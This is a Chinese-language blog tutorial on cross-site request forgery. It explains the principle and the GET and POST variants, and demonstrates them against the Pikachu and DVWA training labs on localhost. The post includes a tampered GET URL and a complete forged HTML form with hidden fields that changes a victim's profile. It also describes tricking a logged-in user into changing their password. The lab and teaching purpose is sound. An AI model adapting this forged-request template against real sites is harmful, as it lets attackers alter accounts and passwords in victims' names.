CSRF漏洞

最新推荐文章于 2024-11-01 01:10:21 发布
最新推荐文章于 2024-11-01 01:10:21 发布
阅读量845 收藏
点赞数
文章标签: csrf php 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51003021/article/details/126421589
版权

CSRF漏洞

1.CSRF原理

CSRF叫做跨域请求伪造(Cross-Site Request Forgery)是一种诱骗用户中技以此来伪造用户请求来对用户数据进行恶意修改的攻击手段。CSRF的影响可以做到以用户的名义修改个人信息,修改密码甚至财产操作等。其攻击原理就是在已知网站请求地址并且用户登录状态下,诱骗用户来获取到用户身份认证信息,然后代替用户去完成已知请求地址的网站功能部分。

CSRF和XSS的区别就是,XSS是以攻击者的身份获取用户信息从而达成某种目标,CSRF是以用户的身份在用户不知情的情况下完成一些操作来达成目标。

CSRF漏洞发生前提:

1.登录信任网站A,并在本地生成Cookie。

2.在不退出的情况下,访问危险网站B。

如果不满足以上两个条件中的一个,就不会受到CSRF的攻击。

在这里插入图片描述

2.CSRF的分类和攻击

CSRF可以分为GET型和POST型。GET型的CSRF攻击是请求数据以GET方式发送给网站后端,通过对URL地址的修改来实施攻击。POST型的CSRF是通过伪造表单来修改用户请求的。

下面以pikachu来演示:

GET型CSRF

在这里插入图片描述

我们登录之后是如下界面,可以修改个人信息,我们现在先正常修改个人信息:

在这里插入图片描述

在这里插入图片描述

我们现在通过抓包获取到url请求地址:

在这里插入图片描述

http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=nv&phonenum=123123&add=uk&email=lili%40pikachu.com&submit=submit

然后对URL地址进行修改变成我们操作之后的URL:

http://localhost/pikachu/vul/csrf/csrfget/csrf_get_edit.php?sex=girl&phonenum=122342343&add=cn&email=lili%40pikachu.com&submit=submit

然后我们在用户登录的情况下欺骗用户点击url:

在这里插入图片描述

POST型CSRF

POST型CSRF我们想要修改用户个人信息的话,就要去伪造页面了,我们先抓包抓到数据:

在这里插入图片描述

然后我们使用如下代码进行伪造:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://localhost/pikachu/vul/csrf/csrfpost/csrf_post_edit.php" method="POST" id="myForm">
      <input type="hidden" name="sex" value="nvnv" />
      <input type="hidden" name="phonenum" value="123456" />
      <input type="hidden" name="add" value="canada" />
      <input type="hidden" name="email" value="lili&#64;pikachu&#46;com" />
      <input type="hidden" name="submit" value="submit" />
      <input type="submit" value="submit">
    </form>
  </body>
</html>

然后我们在用户登录的情况下欺骗用户进入这个页面:

在这里插入图片描述

实战修改密码:

我们首先登录DVWA,看到有一个修改密码页面,我们抓包获取数据之后尝试伪造:

在这里插入图片描述

在这里插入图片描述

然后我们欺骗用户点击:

在这里插入图片描述

发现密码已经被修改。

YNB.小月半
关注
csrf漏洞
m0_55772907的博客
04-27 786
  CSRF(Cross-site Request Forgery,跨站请求伪造),缩写CSRF,也有少数文章称为XSRF,一种利用用户在当前已登录的Web应用程序上执行非本意操作的攻击方法(利用受害者尚未失效的身份认证信息(cookie,会话等),创建恶意伪造的web页面请求,在受害者不知情的情况下向服务器发送请求完成非法操作(转账、改密等))。   简言之,攻击者间接利用受害者合法身份,以其身份发送恶意请求。 1.2 漏洞实质   攻击者通过技术手段欺骗用户的浏览器访问
Web漏洞CSRF(跨站请求伪造漏洞)详解
weixin_46669844的博客
02-04 2732
跨站请求伪造,冒用Cookie中的信息,发起请求攻击。CSRF(Cross-site request forgery)跨站请求伪造:攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的。
CSRF 攻击和防御
weixin_45901764的博客
03-15 1000
CSRF 什么是 CSRFCSRF(跨站请求伪造),攻击者诱导受害者进入第三方网站,在第三方网站中,向被攻击网站发送跨站请求。利用受害者在被攻击网站已经获取的注册凭证,绕过后台的用户验证,达到冒充用户对被攻击的网站执行某项操作的目的。 CSRF 攻击主要是因为Web的身份验证机制虽然可以保证一个请求是来自某个用户的浏览器,但是无法保证该请求是用户批准发送的 CSRF的特点 攻击一般发起在第三方网站,而不是被攻击的网站。被攻击的网站无法防止攻击发生。 攻击利用受害者在被攻击网站的登录凭证,冒充受害者
CSRF漏洞的利用及修复
G3et的博客
02-13 1215
CSRF (Cross-Site Request Forgery) 漏洞是一种 Web 应用程序的安全漏洞,它允许攻击者在用户不知情的情况下执行非法操作。CSRF 攻击通过构造恶意请求来发送给受害者,从而实现对受害者帐户的控制。这些请求看起来就像是从用户自己的浏览器发出的,因此服务器会将它们作为正常请求处理。
浅谈CSRF攻击方式(转)
weixin_34090643的博客
07-08 1785
浅谈CSRF攻击方式 一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF。 二.CSRF可以做什么?   你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件...
CSRF 漏洞
Just a Blog
03-26 951
CSRF 漏洞
CSRFScanner:Python CSRF漏洞扫描器
05-06
Python CSRF漏洞扫描器 描述 CSRFScanner是一种用于扫描网站以查找CSRF漏洞的工具。 这是一个基本工具,不是很人性化,我最初是出于学术目的而开发的。 可以在PDF CSRFScanner_Explications.pdf(以法语编写)中...
hucart-含有CSRF漏洞的源码.zip
12-31
在这个案例中,"hucart-含有CSRF漏洞的源码.zip" 提供了一个实际的示例,让我们深入探讨一下CSRF漏洞的原理、危害以及防范措施。 1. **CSRF漏洞原理**: CSRF漏洞通常发生在Web应用程序中,这些应用未对请求进行...
什么是 CSRF 攻击
热门推荐
点滴
03-28 3万+
CSRF 英文全称是 Cross-site request forgery,所以又称为“跨站请求伪造”,是指黑客引诱用户打开黑客的网站,在黑客的网站中,利用用户的登录状态发起的跨站请求。简单来讲,CSRF 攻击就是黑客利用了用户的登录状态,并通过第三方的站点来做一些坏事 通常当用户打开了黑客的页面后,黑客有三种方式去实施 CSRF 攻击。 下面我们以极客时间官网为例子,来分析这三种攻击方式都是怎么实施的。这里假设极客时间具有转账功能,可以通过 POST 或 Get 来实现转账,转账接口如下所示: 有了上面的
CSRF跨域攻击及预防
song_myth的博客
08-11 801
一.CSRF是什么?   CSRF(Cross-site request forgery),中文名称:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF 二.CSRF可以做什么?   你这可以这么理解CSRF攻击:攻击者盗用了你的身份,以你的名义发送恶意请求。CSRF能够做的事情包括:以你名义发送邮件,发消息,盗取你的账号,甚至于购买商品,虚拟货币转账......造成的问题包括:个人隐私泄露以及财产安全。 三.CSRF漏洞现状   C
PHPCSRF、XSS 攻击和防范
sheji888的专栏
10-29 588
在这类攻击中,攻击者通过利用网页开发时留下的漏洞,注入恶意指令代码到网页,使用户加载并执行这些恶意制造的网页程序。在这种攻击中,攻击者利用已认证的用户身份,在用户不知情的情况下伪造请求,冒充用户的操作向目标网站发起请求。这种攻击通常利用用户浏览器的跨站请求机制,使用户在浏览器中加载恶意的URL或点击恶意链接,从而实现攻击的目的。综上所述,通过综合运用以上策略,可以显著降低CSRF和XSS攻击的风险,为用户和组织提供安全的网络环境。:进行定期的安全测试和渗透测试,模拟XSS攻击并评估防御机制的有效性。
CSRF 攻击 与 SameSite 属性
零一魔法
10-30 616
当用户登录银行网站A(例如bank.com)时,其浏览器会存储认证信息。恶意网站B(例如)可能会包含一个自动提交的请求,模拟用户在银行网站A上的操作,如转账。如果用户被诱骗访问了这个恶意页面,银行网站A将收到带有认证信息的转账请求,从而导致用户的财产损失。常见的处理 CSRF 攻击的方式主要有:CSRF Token(常存储于 session 中)和配置Cookies的SameSite属性。
CSRF与SSRF
最新发布
hanjinming110的博客
11-01 1138
介绍CSRF和SSRF
CSRF防范及绕过
weixin_67289581的博客
10-29 223
检测referer字段例如:一旦没检测到referer头或域名不对就直接放弃处理包的请求所以绕过只能结合xss、文件上传html绕过。
PHP文件包含漏洞
佛系摆烂
10-29 573
PHP 文件包含漏洞(File Inclusion Vulnerability)是一种常见的 Web 安全漏洞,发生在用户对 PHP 文件包含函数(如 include、require、include_once、require_once)的输入缺乏过滤和验证时。攻击者可以利用这个漏洞来包含服务器上任意文件,甚至是远程文件(如果服务器允许),从而获取敏感信息或执行任意代码。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值